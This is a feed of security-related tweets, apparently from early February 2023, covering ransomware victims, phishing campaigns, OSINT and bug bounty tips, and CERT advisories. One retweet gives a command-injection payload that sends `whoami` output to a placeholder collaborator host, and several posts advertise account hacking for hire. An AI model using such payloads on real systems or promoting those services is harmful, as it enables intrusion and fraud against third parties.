MrrFawadkhann: RT @hetmehtaa: Disclosing Facebook page admins by playing a game 🎲 #Facebook #Infosec #Hacking #TheSecureEdge #Bugbounty https://t.co/R8w… -- MrrFawadkhann
MrrFawadkhann: RT @imrook1337: Recon tip 69: Looking for acquisitions and don't wanna spend money? Try this Google dork- site:https://t.co/p3uy6jTJqq inte… -- MrrFawadkhann
NonprofitGood: Breach hits GoTo, the parent company of LastPass https://t.co/GRX6vM1kus #efani #StopTracking #BTC #Solar… https://t.co/QYEKoChhKk -- NonprofitGood
RDSWEB: RT @GeoPioneerInc: Kherson region comes under Russian fire #Ukraine #OSINT https://t.co/DhWZHKLxRt -- RDSWEB
RobertMdoe95: RT @selemanykitenge: Please enjoy my new article titled: Uncovering the untapped potential of African Intelligence Services” published by a… -- RobertMdoe95
sectest9: RT @EChavarro: What’s in store for #ransomware in 2023? @Kaspersky believes the next #WannaCry is just around the corner (via @securityweek… -- sectest9
sectest9: RT @NonprofitGood: Breach hits GoTo, the parent company of LastPass https://t.co/GRX6vM1kus #efani #StopTracking #BTC #Solar #GrantsAvaila… -- sectest9
sectest9: RT @vallumsoftware: As #SocialEngineering Tactics Change, So Must Your #Security Training - https://t.co/pVrs4oeyIX #cybersecurity #cybercr… -- sectest9
sectest9: RT @hetmehtaa: How To Attack Admin Panels Successfully ✅ Part 1: https://t.co/hzBpfmYBNB Part 2: https://t.co/63r6Ey6EvZ #infosec #BugBo… -- sectest9
StanleyEpstein: Financial software firm Ion Group battles LockBit ransomware attack #Ransomware via https://t.co/eBW8Lmmpx7 https://t.co/HFqQ3zM9uG -- StanleyEpstein
technisette: https://t.co/epa3X1MVN0 Easy way to get familiar with OSINT is to take a course. And @myosinttrainer has some great… https://t.co/39qhUQbUYo -- technisette
technisette: Added to Tutorials - OSINT libraries https://t.co/RYfTijnRUX #osint https://t.co/zz27o5dWeS -- technisette
tegodata: Last year, we shared that a #cybercrime group targeted #healthcare and the public health sector through #ransomware… https://t.co/ia2AVbKcmz -- tegodata
TharunThej4: RT @thebinarybot: Want quality and quantity at the same time? Okay, let's do it. Here's 50 YouTube channels that you can subscribe to upsk… -- TharunThej4
ThreatConnect: Security Operations teams must modernize by adopting an approach that puts threat intelligence at the core of your… https://t.co/5G0jjFGGwp -- ThreatConnect
webglimpser: RT @hack_git: FinGen A #ChatGPT based penetration testing findings generator. https://t.co/hbleJ4nRWV #pentesting #bugbounty #redteam #h… -- webglimpser
2911xavier: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- 2911xavier
AJBlackston: Massive Marijuana Trafficking, Money Laundering Ring Includes 15 From Capital Region, Feds Say… https://t.co/XmRBHyKR7y -- AJBlackston
AmChemistry: The celebration continues! It’s our 150th anniversary &amp; we are celebrating a century &amp; a half of performance, progress &amp; possibility! Learn more about our 150-year history at https://t.co/7tKrP5leAm. #ACC150 https://t.co/tqEOVgvU -- AmChemistry
AmChemistry: Did you know: The #BusinessOfChemistry accounted for 38% of the total construction spending by the U.S. #mfg sector in 2021. Get more facts: https://t.co/Bxbcr5iCFT https://t.co/KhGgBywND8 -- AmChemistry
anon777thor: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- anon777thor
CyberIQs_: Rising ‘Firebrick Ostrich’ BEC Group Launches Industrial-Scale Cyberattacks #infosec #infosecurity #cybersecurity… https://t.co/5K5ZPoXchi -- CyberIQs_
CyberIQs_: 6 Examples of the Evolution of a Scam Site #infosec #infosecurity #cybersecurity #threatintel #threatintelligence… https://t.co/9YZVSbv4L7 -- CyberIQs_
CyberSecurityN8: RT @legallycyber: https://t.co/nyDzImKx10 #FINTECH needs to prep for #cybersecurity threats and #hacktivism in 2023. Know your #ISP, create… -- CyberSecurityN8
CyberSecurityN8: RT @CyberIQs_: 6 Examples of the Evolution of a Scam Site #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #… -- CyberSecurityN8
DasFintechBot: RT @legallycyber: https://t.co/nyDzImKx10 #FINTECH needs to prep for #cybersecurity threats and #hacktivism in 2023. Know your #ISP, create… -- DasFintechBot
HC_Ready: Healthcare Ready was recently awarded a grant from @funds4disaster! We’re looking forward to working with CDP to support &amp; expand the capacity of healthcare workers serving socially vulnerable communities through the ongoing #COVID19 respons -- HC_Ready
MyntexInc: You might be surprised to know that Threema admits to the many ways it is inferior to ChatMail™. Don't believe it?… https://t.co/fw7VFptd4b -- MyntexInc
NEI: In 2022, Congress passed the single most important piece of legislation for #nuclear in decades: the Inflation Reduction Act. How will it impact the nuclear industry—and what's next? We asked the expert, NEI’s VP of Government Affairs Beverly Marshal -- NEI
RabiaNoureen11: Microsoft Warns About New Consent-Phishing Attacks Used to Steal Data #microsoft #security #phishing https://t.co/DzS0pa4JbX -- RabiaNoureen11
RettiwtTob: RT @SalesSuccess: There's a new type of #phishing scam to be aware of online. Angler phishing is a type of social media in which threat act… -- RettiwtTob
SalesSuccess: There's a new type of #phishing scam to be aware of online. Angler phishing is a type of social media in which thre… https://t.co/4IBtgF8kE4 -- SalesSuccess
sectest9: RT @legallycyber: https://t.co/nyDzImKx10 #FINTECH needs to prep for #cybersecurity threats and #hacktivism in 2023. Know your #ISP, create… -- sectest9
sectest9: RT @SalesSuccess: There's a new type of #phishing scam to be aware of online. Angler phishing is a type of social media in which threat act… -- sectest9
SirSay8: AutLand Suite Microsocial v22.38 Full Activated – Social Media Marketing – Discount 100% OFF… https://t.co/SYC4mEnYgC -- SirSay8
SWRMCEO: RT @tegocyber: Phishing scams have become increasingly sophisticated with fraudsters performing in-depth research, utilizing social media,… -- SWRMCEO
TechNative: #ZeroTrust: Leading with example #infosec #cyberthreats #cyberattacks #leaders #CISO #CIO #CTO #DataSecurity… https://t.co/DI8qjQeDUO -- TechNative
tegocyber: Phishing scams have become increasingly sophisticated with fraudsters performing in-depth research, utilizing socia… https://t.co/Ln4330TQ7c -- tegocyber
THaagen: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- THaagen
unclefidii: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- unclefidii
AgidCert: Campagne #Qakbot 🇮🇹 con file #OneNote armato di script HTA per scaricare la DLL ed eseguirla con parametro offuscato nello script. ❗️Process hollowing su wermgr exe ❗️Attende 5 min prima di contattare i C2 IoC 👇 🔗 https://t.co/WNOGMdgBdG Det -- AgidCert
AgidCert: Campagne 🇮🇹 #phishing #serverless mirata al furto delle credenziali 📃 Frontend su #IPFS, nessuna necessità di un configurare un hosting ⚙️ Backend fornito da #formsubmit invia i dati a email 🖼 Logo vittima fornito da https://t.co/sEBNSsAVmS -- AgidCert
CSIRTGOB: 🚨Desde el CSIRT de Gobierno compartimos información de vulnerabilidades críticas que afectan a #OpenEMR 🚑 ¡A actualizar!🩹Detalles: https://t.co/yKx5Q1MZxh #vulnerabilidades #CSIRTGob @SubseInterior https://t.co/4EVPoFL3tO -- CSIRTGOB
4ntN3t: RT @abuse_ch: #Malspam distributing #IcedID 📨 DOC: https://t.co/4AgHpn5Dnv EXE: https://t.co/r7HAEcszoR Payload URL (lotusabloom .com):… -- 4ntN3t
ADITYASHENDE17: If you still haven’t join our discord server then feel free to use this as invitation: Loads of resources are share… https://t.co/k0KVMB25py -- ADITYASHENDE17
beefyspace: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- beefyspace
beefyspace: RT @ecarlesi: Possible threat on hxxps://aitoday[.]news/latest[.]zip #phishing #opendir #nc -- beefyspace
Cryptolaemus1: RT @James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email exf… -- Cryptolaemus1
CyberDFIR: RT @WebCannon_: Hacking is way Easier when you contact the right hacker. Inbox me now for all your hacking services I'm always available 2… -- CyberDFIR
CyberDFIR: RT @cyber_hacks12: If you need Help with recovering any Hacked Account, Mails, Tiktok, Snapchat, Instagram etc.. I'm available 24/78 Inbox… -- CyberDFIR
CyberSecurityN8: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- CyberSecurityN8
CyberSecurityN8: RT @RedPacketSec: BlackCat/ALPHV Ransomware Victim: McEwan Fraser Legal - https://t.co/Jdk3blaHls #ALPHV, #BlackCat, #darkweb, #databreach… -- CyberSecurityN8
DYNTEK: #Fortinet Next-Generation Firewalls (#NGFWs) are designed to offload critical security and networking functions to… https://t.co/WfSQuNGIwm -- DYNTEK
Dzeuzif3: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- Dzeuzif3
ecarlesi: Possible threat on hxxps://aitoday[.]news/latest[.]zip #phishing #opendir #nc -- ecarlesi
ecarlesi: Threat on hxxps://mv-coinbase[.]xyz/ultimate-update-coinbase[.]zip #phishing #opendir https://t.co/SlzT0dKvUp -- ecarlesi
Hackwithmark: For #Hacked #Gmail recovery Dm now #Hackedgmail #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech… https://t.co/MabmjLUONz -- Hackwithmark
Hackwithmark: For support and help, contact your favorite #Hacker fast and reliable. All social media #CyberSecurity #hacker… https://t.co/6t3yvyMeab -- Hackwithmark
Hackwithmark: For Hacking or any Recovery services Dm now! #CyberSecurity #hacker #infosec @reach2ratan #security #cyber #tech… https://t.co/ULiJEpo3aL -- Hackwithmark
isabel_harker: Have exclusive Hacking jobs? DM and Ask for my service. #hacked #icloud #facebookdown #imessage #ransomware… https://t.co/g6DgZAWUGi -- isabel_harker
jerrytech20: You lost your account? A good hacker is all you need. DM now. #hacked #icloud #facebookdown #imessage #ransomware… https://t.co/FNx2ANpqXD -- jerrytech20
jerrytech20: Hacking attempts on your device? DM now for risk free security solutions. #hacked #icloud #facebookdown #imessage… https://t.co/FvMksKZM08 -- jerrytech20
Joneshacksit: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware… https://t.co/ICCUEh3EZw -- Joneshacksit
JRoosen: RT @James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email exf… -- JRoosen
MaxBaburin: RT @HackenProof: ✅ [New Bug Bounty Reward Record] @NEARProtocol Has Launched Bug Bounty With Up to $1 000 000 Reward Per Critical Vulnerab… -- MaxBaburin
mcgoverntheory: RT @Steiner254: JAY Token Exploit — Reentrancy Attack by Shashank #BugBounty #web3community https://t.co/4fEpCudHI2 -- mcgoverntheory
NonprofitGood: MI5 unlawfully collected and held millions of people’s data https://t.co/gRY1onAvNu #efani #StopTracking #BTC… https://t.co/rU5qeCK7sF -- NonprofitGood
programmerjoke9: I know just enough BASIC to understand this joke in Futurama#100Daysofcode #javascript #programming #dev #linux… https://t.co/fndWL9qONX -- programmerjoke9
proxy_hopper: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- proxy_hopper
rahul05ranjan: RT @programmerjoke9: I know just enough BASIC to understand this joke in Futurama#100Daysofcode #javascript #programming #dev #linux #java… -- rahul05ranjan
rameez8146: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- rameez8146
RedPacketSec: BlackCat/ALPHV Ransomware Victim: McEwan Fraser Legal - https://t.co/Jdk3blaHls #ALPHV, #BlackCat, #darkweb, … https://t.co/j53jyCUq1a -- RedPacketSec
RobOS8: RT @TrendMicroRSRCH: [4/6] The Magniber #ransomware uses a file detected as Fodscript that drops two script files: the first script modifie… -- RobOS8
sectest9: RT @programmerjoke9: I know just enough BASIC to understand this joke in Futurama#100Daysofcode #javascript #programming #dev #linux #java… -- sectest9
Summit_VX: #Fortinet Next-Generation Firewalls (#NGFWs) are designed to offload critical security and networking functions to… https://t.co/SOuJSmX8dZ -- Summit_VX
AmChemistry: The travel honoraria application deadline for #PolyCon23 has been EXTENDED to Friday, Feb. 10. The opportunity is open to students pursuing a Masters or Ph.D. in a relevant scientific discipline. Learn more and apply today! https://t.co/PqA -- AmChemistry
AviationISAC: Yesterday, the last @Boeing 747 landed at @CVGairport. @AtlasAirWW was the last customer dedicating a special route along the way. We are proud to have three Aviation ISAC members involved in this historic moment. https://t.co/wg4JR2TxJH #qu -- AviationISAC
Dark_Asaeru: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- Dark_Asaeru
DonnaOl43885754: RT @security_wang: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE L… -- DonnaOl43885754
GothamTG: Analyzing Malware Code that Cryptojacks System to Mine for Monero Crypto via @Fortinet #Cybersecurity #Malware https://t.co/ZP1OR2VAox -- GothamTG
GreenFrogPub: RT @NSight365: Are you careful about the emails you open and the links that you clock on? We hope you are being #CyberSafe and not becoming… -- GreenFrogPub
Hacware1: ✨️ Automation makes adding HacWare to your MSP's cybersecurity offerings simple, easy and impactful - without addin… https://t.co/5Hog2zhh2j -- Hacware1
HacwareInc: ✨️ Automation makes adding HacWare to your MSP's cybersecurity offerings simple, easy and impactful - without addin… https://t.co/aEKgpKJ4r7 -- HacwareInc
HealthISAC: This week, Hacking Healthcare begins with an update on Russian cyber retaliation against Germany, and assess the recent news of a multinational takedown of the prolific Hive cybercriminal group and analyze the overall effects. #Ransomware #Cyb -- HealthISAC
isabel_harker: Wondering how to #Recover, #hacked, retrieve, or protect any accounts or wallets DM now #CyberSecurity #hacker… https://t.co/IPJ7roFWfn -- isabel_harker
Lukyluke311: RT @crispSV: #Russia Navy Tu-154M RF-85856 heading to #Kaliningrad from #Murmansk. Likely Russia Marines. #OSINT https://t.co/QjLe0S4SOL -- Lukyluke311
Michael01611665: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- Michael01611665
OsintJobs: RT @OsintJobs: Ever see a job ad asking for too much experience for an entry-level role? You can help the #OSINT community by sharing you… -- OsintJobs
phishprotection: Scammers use malicious Word documents to spread malware via phishing emails. Online attackers have innovated a new… https://t.co/ft50GapiRM -- phishprotection
RCSProServices: Join us on February 16th for another Phish &amp; Business Themes live stream 🎉 The more phans, the merrier! RSVP here:… https://t.co/W7HU4j2ZX2 -- RCSProServices
RedPacketSec: Royal Ransomware Victim: MESSER CUTTING SYSTEMS - https://t.co/CPnQfIqAu5 #Royal #Ransomware #OSINT #ThreatIntel #darkweb #TOR -- RedPacketSec
RedPacketSec: CISA: Cisco Releases Security Advisories for Multiple Products - https://t.co/5JFQjd69nx #CISA #OSINT #ThreatIntel #Cyber -- RedPacketSec
RH_ISAC: New versions of Prilex point of sale (POS) malware include the capability to block contactless payment transactions. https://t.co/WeeCCpeHke -- RH_ISAC
rick_ehrhart: RT @KennaSecurity: Technical Solutions Architect Cam Dunn shares how Kenna Security makes sense of the different #threatintelligence feeds… -- rick_ehrhart
rollymsouth: RT @selemanykitenge: Please enjoy my new article titled: Uncovering the untapped potential of African Intelligence Services” published by a… -- rollymsouth
rorypresley: RT @PhishCompanion: #OnThisDay 2/02/1990 The Georgia Theatre Athens, GA https://t.co/wurGKt6dzx ⭐ 3/5 (1 ratings) https://t.co/nIsNtwdXiF… -- rorypresley
s4msecurity: RT @RedPacketSec: CISA: Cisco Releases Security Advisories for Multiple Products - https://t.co/5JFQjd69nx #CISA #OSINT #ThreatIntel #Cyber -- s4msecurity
SamuelPages2: RT @Richard_S81: #Hacking #Trickgate #TrickgatePacker #Vulnerability #Malware #CyberCrime #CyberAttack #CyberSecurity #ITSecurity TrickGat… -- SamuelPages2
SamuelPages2: RT @Richard_S81: #Hacking #UNC2565 #Gootloader #Vulnerability #Malware #CyberCrime #CyberAttack #CyberSecurity #ITSecurity The threat acto… -- SamuelPages2
sectest9: RT @RedPacketSec: BlackCat/ALPHV Ransomware Victim: McEwan Fraser Legal - https://t.co/Jdk3blaHls #ALPHV, #BlackCat, #darkweb, #databreach… -- sectest9
sectest9: RT @NSight365: Are you careful about the emails you open and the links that you clock on? We hope you are being #CyberSafe and not becoming… -- sectest9
sectest9: RT @Hacware1: ✨️ Automation makes adding HacWare to your MSP's cybersecurity offerings simple, easy and impactful - without adding more wor… -- sectest9
security_wang: Ukraine has warned about new strains of GammaLoad and GammaSteel #malware that Russian-sponsored hackers are using… https://t.co/naqNYqHHJH -- security_wang
SocEngineerInc: DocuSign Brand Impersonation Attack Bypasses Security Measures, Targets Over 10,000 https://t.co/WUEx75aEas… https://t.co/5Mfv9PGstC -- SocEngineerInc
Spiceworks: Running out of time to catch up on top tech news? Check out SNAP - The Tech News curated to your taste :)… https://t.co/qhIDIhy38C -- Spiceworks
stanholtsclaw: Beware #fraudulent @PayPal invoices that are utilizing the legitimate #PayPal invoicing system in an attempt to tri… https://t.co/Nz08mQ1fJw -- stanholtsclaw
SUNDARR_INSA: RT @TowardsCybersec: The threat actors associated with the Gootkit malware have made "notable changes" to their toolset, adding new compone… -- SUNDARR_INSA
VishalS60820032: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- VishalS60820032
WayOutInWesley: RT @IRONSCALES: 📌 Learn from industry experts on how to tackle #phishing head-on. Don't miss our SVP of Product Management, @davidhabusha,… -- WayOutInWesley
WhispeStupid: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- WhispeStupid
bjCSIRT: Bulletin d'alerte du bjCSIRT sur une vulnérabilité de type Path transversal dans vmware vrealize log insight https://t.co/7j1IwyCO2x -- bjCSIRT
NJCybersecurity: Smartphones &amp; other devices provide convenience, but the software &amp; services they contain come with security &amp; privacy implications. #TikTok &amp; other social media apps raise particular concerns, including to national securi -- NJCybersecurity
_imvibek: RT @NoRed0x: Sensitive Data Exposure (JS Recon) "accessToken:" and "oauth_token:" #bugbounty #bugbountytips #bugbountytip #AWS https://t.c… -- _imvibek
4nk_news: Ep. 560/SEXTORTION/EXTORTION/CYBER FRAUDSTERS/F.I.R. U/SEC.385/MUMBAI PO... https://t.co/8ztbrLbsFv via @YouTube… https://t.co/pXApedpF97 -- 4nk_news
AMIR26134764: RT @TheEbizWizard: Cyber Trends for 2023: The Bots are Still Coming, but Humans are Driving Them https://t.co/67P8jevV8G #DigitalTransforma… -- AMIR26134764
AshishRaosahab6: RT @cycatz2: #CyCatz #cybersecurity Account Takeover (Insecure Design+ Response manipulation) more … https://t.co/i8Sry5ksx6 #cyberawaren… -- AshishRaosahab6
BilekSimon: With its steady evolution over the last 8+years, #Emotet's evasion tactics have become increasingly sophisticated.… https://t.co/l5JzDP9EFv -- BilekSimon
c3retc3: RT @Steiner254: Bug Bounty Writeup: Payment bypass using Response manipulation #BugBounty #APISecurity #cybersecuritytips https://t.co/Dht… -- c3retc3
CyberSec_Chris: #Cybercrime is prevalent and causes damage to businesses of all sizes. Because of how multifaceted cybercrime had b… https://t.co/YSxb1tdPle -- CyberSec_Chris
CyberSecurityN8: RT @poulsen_hack58: Offering the best recovery services. And media accounts hacking, Infiltration, and recovery. #hackedinstagram #TwitterD… -- CyberSecurityN8
CyberSecurityN8: RT @Manvinder0987: What's your favorite nuclei template #togetherwehitharder #bugbountytips #BugBounty #bugcrowd #hackerone -- CyberSecurityN8
druvainc: #Ransomware Protection and Recovery with Druva. Recover from ransomware in hours, not days. https://t.co/khPwAqMIYa… https://t.co/8pvneq2Hez -- druvainc
ecarlesi: Possible threat on hxxps://diquarks[.]com/UltimatePOS[.]zip #phishing #opendir #nc https://t.co/KrIIvqDru3 -- ecarlesi
fe_tsoc: RT @James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email exf… -- fe_tsoc
GokouKurone: RT @PamArtpat: YCH emote Valentine's Day! Price: 10 usd Interesed in DM! The character in the third image belongs to @PurinSeishin #YCH #y… -- GokouKurone
hetmehtaa: RT @hetmehtaa: Disclosing Facebook page admins by playing a game 🎲 #Facebook #Infosec #Hacking #TheSecureEdge #Bugbounty https://t.co/R8w… -- hetmehtaa
James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email… https://t.co/37OoEGnlV5 -- James_inthe_box
julian_bonnett: RT @PrivacyNinjaSG: 🤔 Businesses of all sizes must stay informed and aware of the overlooked cyber risks, from malware to data breaches. P… -- julian_bonnett
Manvinder0987: What's your favorite nuclei template #togetherwehitharder #bugbountytips #BugBounty #bugcrowd #hackerone -- Manvinder0987
MicroFocusSec: RT @ExitoEvents: Presenting to you our sponsors and partners for the upcoming 16th Edition of Cyber Security Summit Kenya supported by @kcs… -- MicroFocusSec
MySecureNetwork: Crab season opens in #SanFrancisco Bay region: https://t.co/9T4mSJLv7Q. Also open #headcrab season for malware on R… https://t.co/ngYuVosVsW -- MySecureNetwork
nobrowncow: #Ransomware was down in 2022, but we still have a long way to go. Build up your #securitystanding and avoid becomi… https://t.co/MsUTDiuHJA -- nobrowncow
notakodr: Legendary fundamentals by @NetworkChuck! #linux #bugbounty #pentest #infosec #hacktheplanet #bountyhunter https://t.co/psPVkEP3ZG -- notakodr
OfficialBoaTech: How can you protect against insider attacks? Find out with @MicroFocusSec's new Insider Threat Prevention hub:… https://t.co/L9ZQmUA8xI -- OfficialBoaTech
poulsen_hack58: Offering the best recovery services. And media accounts hacking, Infiltration, and recovery. #hackedinstagram… https://t.co/K58JhRsAd9 -- poulsen_hack58
poulsen_hack58: Have exclusive Hacking jobs? and Ask for my service. #hacked #icloud #facebookdown #imessage #ransomware #snapchat… https://t.co/Wn7bsLhxZK -- poulsen_hack58
Ratnadeepdeyroy: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- Ratnadeepdeyroy
sectest9: RT @Virdoex_hunter: I am live right now on my YouTube #bugbounty -- sectest9
thefintechtimes: Up to £4billion was lost to fraudsters in the UK in 2022; reveals https://t.co/aOpNbr6xfU in its latest #fraud and… https://t.co/pb9ED8cvPc -- thefintechtimes
TripwireInc: When it comes to phishing, you can’t defend against what you don’t understand.🎣 Katrina Thompson looks at six of t… https://t.co/HbkuwVBke1 -- TripwireInc
Virdoex_hunter: I am live right now on my YouTube #bugbounty -- Virdoex_hunter
Xp_L0iT_3r: RT @gonzxph: My first time RCE you can embed a link on your target program? try this one Payload: http://collaboratorlink(.)com?`whoami`… -- Xp_L0iT_3r
zaenhaxor: RT @0xnirob: Earned More than $10000 in bounties, successfully hacked 11 company. want to learn more about 'Dependency Confusion' attack? T… -- zaenhaxor
Abdulsamadmur12: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- Abdulsamadmur12
Adam_K_Levin: A Phishing-as-a-Service operation is selling over 1800 Android #phishing forms on the dark web: https://t.co/gcxKLpuEBk -- Adam_K_Levin
adambacker4: RT @OSINTKNIGHT: If you have donated to Ukraine, thank you! But in my eyes, if you support Ukraine, you are a #fella #WeAreNafo #OSINT #Sla… -- adambacker4
AmChemistry: The deadline for paper abstracts for #PolyCon23 is now Friday, Feb. 10! Submit yours today for the chance to highlight the latest, innovative #Polyurethanes technology. https://t.co/X89PJiD25E https://t.co/P7iymsDVbX -- AmChemistry
amoxibos: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- amoxibos
C_3PJoe: Learn the basics of #cryptocurrency #investigations in our 4-hour course on Feb 6th, 6-10 PM ET! We'll cover the le… https://t.co/tgYlpDgA46 -- C_3PJoe
CyberGuardNews: OneNote documents spread #malware in several countries https://t.co/riLYsWGftY #Sec_Cyber -- CyberGuardNews
CyberSecurityN8: RT @PligenceLtd: Top mobile security threats. #ThreatIntel #phishing #Ransomware #cyberattacks #privacy #cyberintelligence #CybersecurityN… -- CyberSecurityN8
CyberSecurityN8: RT @OfficialBoaTech: How can you protect against insider attacks? Find out with @MicroFocusSec's new Insider Threat Prevention hub: #Threat… -- CyberSecurityN8
ecarlesi: Threat on hxxp://mv-coinbase[.]xyz/ultimate-update-coinbase[.]zip #phishing #opendir -- ecarlesi
henkvaness: Nice #osint going on in https://t.co/eVsU3D4f2X with a Kudos to @Sector035 . How OSINT tools unmasked people involv… https://t.co/z8VvgUh6YG -- henkvaness
henkvaness: Nerd alert ! Nice #osint going on in https://t.co/eVsU3D3Hdp with a Kudos to @Sector035 . How OSINT tools unmasked… https://t.co/TtVEkMVSXU -- henkvaness
JanesINTEL: Make sure you visit us @IDEX_UAE to see how Janes open-source intelligence can provide you with assured actionable… https://t.co/olkydaPNtq -- JanesINTEL
jayeshmthakur: RT @PligenceLtd: Top mobile security threats. #ThreatIntel #phishing #Ransomware #cyberattacks #privacy #cyberintelligence #CybersecurityN… -- jayeshmthakur
Mirazon: Attackers that use #phishing get around #Microsoft's verified publisher checks by making apps that trick users into… https://t.co/UYWMNjGJhi -- Mirazon
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://sudaddy[.]com/invoice/adobe-… https://t.co/9X1xnH8i63 -- noladefense
osintbear: OSINT with TorBot: An Overview of How to Use Instant Messaging for Anonymous Web Browsing https://t.co/45a4SsjI3U #OSINT -- osintbear
PhishStats: https://t.co/MAuIXRvYiq detected 49 new websites hosting #phishing | new today: 599 | #infosec #cybersecurity… https://t.co/uqeZ6gMewA -- PhishStats
pixelw00ks: What's your Groundhog Day? 🐿 On 12/31/03, I went scuba diving in the morning + saw Phish at night. Doesn't get muc… https://t.co/1XeRQRJv0q -- pixelw00ks
poulsen_hack58: Wondering how to #Recover, #hacked, retrieve, or protect any accounts or wallets DM now #CyberSecurity #hacker… https://t.co/Z5O87O9bMp -- poulsen_hack58
RealEstateISAC: The latest Real Estate ISAC Daily Report! https://t.co/if5xhv6Jnj Thanks to @REITs_Nareit @ApartmentWire #cybersecurity #ransomware -- RealEstateISAC
revoluc27337281: RT @TheHackersNews: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE… -- revoluc27337281
revoluc27337281: RT @TheHackersNews: 🚨 HeadCrab Alert! A new stealthy botnet #malware that is undetectable by various antivirus solutions has infected over… -- revoluc27337281
sectest9: RT @TripwireInc: When it comes to phishing, you can’t defend against what you don’t understand.🎣 Katrina Thompson looks at six of the most… -- sectest9
sectest9: RT @MySecureNetwork: Crab season opens in #SanFrancisco Bay region: https://t.co/9T4mSJLv7Q. Also open #headcrab season for malware on Redi… -- sectest9
sectest9: RT @TheHackersNews: 🚨 HeadCrab Alert! A new stealthy botnet #malware that is undetectable by various antivirus solutions has infected over… -- sectest9
sectest9: RT @OfficialBoaTech: How can you protect against insider attacks? Find out with @MicroFocusSec's new Insider Threat Prevention hub: #Threat… -- sectest9
sectest9: RT @SOC_Prime: #ECS Premium Log Source Pack enables fast integration of 52 log sources with the @elastic platform and provides essential lo… -- sectest9
SOC_Prime: #ECS Premium Log Source Pack enables fast integration of 52 log sources with the @elastic platform and provides ess… https://t.co/5r5WXdWrc9 -- SOC_Prime
splinter_code: RT @securityaffairs: Thanks @splinter_code #LockBit #ransomware gang releases LockBit #Green version https://t.co/9Mq07BBd7k #securityaffai… -- splinter_code
threatshub: ThreatsHub Cybersecurity News | Super Bock says 'cyber' nasty 'disrupting computer services' -… https://t.co/M4mtXbvenn -- threatshub
unix_root: Ukraine has warned about new strains of GammaLoad and GammaSteel #malware that Russian-sponsored hackers are using… https://t.co/dcUVx4pzT3 -- unix_root
VstrxI: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- VstrxI
certbr: Preserve seu ambiente profissional. Antes de divulgar uma informação avalie se ela pode prejudicar a imagem da sua empresa. #dicacertbr -- certbr
csirt_it: #F5: aggiornamenti di sicurezza di febbraio sanano molteplici vulnerabilità in alcuni prodotti, di cui 13 con gravità “alta” Rischio: 🟡 Tipologia: Remote Code Execution, Denial of Service 🔗 https://t.co/0NQvgSWZkY 🔄 Aggiornamenti disponibili -- csirt_it
IndianCERT: CERT-In is observing 'Cyber Swachhta Pakhwada' on 1st to 15th february 2023 to create awareness and cyber hygiene practices. #CyberSecurityAwareness #SwachhataPakhwada #SwachhBharat #IndianCERT #CyberSwachhtaKendra #csk #CleanIndia https://t.c -- IndianCERT
IndianCERT: CERT-In is observing 'Cyber Swachhta Pakhwada' on 1st to 15th february 2023 to create awareness and cyber hygiene practices. #CyberSecurityAwareness #SwachhataPakhwada #SwachhBharat #IndianCERT #CyberSwachhtaKendra #csk #CleanIndia https://t.c -- IndianCERT
NJCybersecurity: A new malware tracked as “BOLDMOVE” exploits a recently patched FortiOS vulnerability for the purpose of conducting suspected China-based cyber espionage. A Fortinet advisory urges customers to apply patches immediately. Details &amp; re -- NJCybersecurity
gatestone: RT @japi999: Hunting IT professionals on the dark web @kaspersky "#cybercrime communities use the same methods for recruiting new members… -- gatestone
japi999: Hunting IT professionals on the dark web @kaspersky "#cybercrime communities use the same methods for recruiting n… https://t.co/9NsnWpvzCl -- japi999
joepettit2: Extortion emails come in many guises, but essentially they work by using threats to extort money, evoking intense f… https://t.co/kynCbiUiAh -- joepettit2
